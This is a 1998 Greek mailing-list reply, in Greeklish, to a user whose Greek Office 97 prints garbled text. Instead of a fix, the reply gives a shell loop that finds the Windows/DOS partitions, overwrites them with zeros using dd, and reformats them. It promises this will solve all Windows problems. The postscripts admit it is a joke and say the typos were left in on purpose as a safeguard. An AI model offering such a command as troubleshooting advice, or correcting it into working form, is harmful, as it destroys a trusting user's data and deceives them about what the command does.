MS Office 97

Alexios Chouchoulas alexios at vennea.demon.co.uk
Sun Mar 8 13:19:01 EET 1998

On 6 Mar 1998, Nikitas Mantikos wrote:

> Exw to ellhniko office 97, kai opote paw na kanw ektypwsh me ellhnikes
> grammatoseires, mou bgazei kati kinezika. Ap' oti mou eipane, einai ena
> akoma bug ths microsoft. Mhpos kserei kapoios pws mporw na stamathsw ayto
> to problhma;

  Kane boot apo ena Linux floppy kai grapse:

for a in `fdisk -l 2>/dev/null|gawk -- '/^\/dev\/.*DOS/{print $1}'`; do
dd if=/dev/zero off=$a bs=1k count=1024; mkef2s $a; done

  Afto tha lysei OLA ta problhmata sou me ta Windows kai to Office.

A.

PS: Opoios to treksei afto einai aksios ths moiras tou (an kai yparxei
    skopimh luser-safe asfaleia ekei mesa gia osous einai poly periergoi).
PS2: Gia tous pragmatika arrwstous, nai, yparxoun ki alloi tropoi na ginei.
PS3: Gia tous pragmatika sxolastikous, nai, skopima yparxoun ta lathi. Blepe
     PS.

Alexios Chouchoulas         '88    ,88'   ,88'   http://www.vennea.demon.co.uk
The Unpronounceable One    ,o88oooo88ooooo88oo,     alexios at vennea.demon.co.uk

Gia boithia (h na diagrafhte) e-mail sto majordomo at argos.hol.gr